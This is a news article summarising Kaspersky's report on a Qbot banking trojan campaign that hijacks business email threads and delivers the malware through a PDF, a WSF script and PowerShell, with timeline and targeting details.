New Qbot campaign delivers malware by hijacking business emails

Cyberattacks that use banking trojans of the Qbot family have been targeting companies in Germany, Argentina, and Italy since April 4 by hijacking business emails, according to a research by cybersecurity firm Kaspersky.

In the latest campaign, the malware is delivered through emails written in English, German, Italian, and French. The messages are based on real business emails that the attackers have gained access to. This gives the attackers the opportunity to join the correspondence thread with messages of their own, Kaspersky said in its report.

Through such emails, the attackers would try and persuade the victim to download an attached PDF, which would eventually help them install the Qbot trojan on the victim’s computer.

Qbot, also known as Qakbot or Pinkslipbot, is a banking trojan that was first observed in 2007 and is designed to steal victims’ banking credentials. The trojan has gone through multiple modifications and improvements and has become one of the most actively spread malware.

“Such simulated business correspondence can obstruct spam tracking while increasing the probability of the victim falling for the trick,” Kaspersky said.

“For authenticity, the attackers put the sender’s name from the previous letters in the ‘From’ field; however, the sender’s fraudulent email address will be different from that of the real correspondent,” Kaspersky said in the report.

Use of PDF and WSF files to install the trojan

The Qbot malware delivery campaign begins with an email with a PDF file in the attachment being sent to the victim. The PDF file’s content imitates a Microsoft Office 365 or Microsoft Azure alert, recommending that the victim clicks “Open to view the attached files.” Once opened, an archive is downloaded from a remote server.

“In the downloaded archive, there is a .wsf (Windows Script File) file containing an obfuscated script written in JScript,” Kaspersky said. When the WSF file is de-obfuscated, a payload PowerShell is revealed.

The PowerShell script then runs on the victim’s computer to download the Qbot trojan, which then tries to steal the victim’s banking credentials. 

New campaign peaked between April 4 and April 12

The first emails with malicious PDF attachments began to arrive on the evening of April 4. The mass email campaign began at 12:00 pm on the following day and continued until 9:00 pm, Kaspersky said.

During this time approximately a total of 1,000 emails were detected. The second upsurge began on April 6, at noon, with over 1,500 emails dispatched. “For the next few days new messages kept coming, and soon, on the evening of April 12 we discovered another upsurge with 2,000 more letters (emails) sent to our customers,” Kaspersky said. Since then, the cybercriminal activity went down, but users still receive fraudulent messages.

The campaign mainly targets users in Germany, Argentina, and Italy.

In March, Qbot was the most prevalent malware with an impact of more than 10% on worldwide organizations, according to CheckPoint. Qbot employs several anti-VM, anti-debugging, and anti-sandbox techniques to hinder analysis and evade detection.

The trojan’s distribution methods have also evolved. Earlier it was distributed through infected websites and pirated software. “Now the banker (banking trojan) is delivered to potential victims through malware already residing on their computers, social engineering, and spam mailings,” Kaspersky said.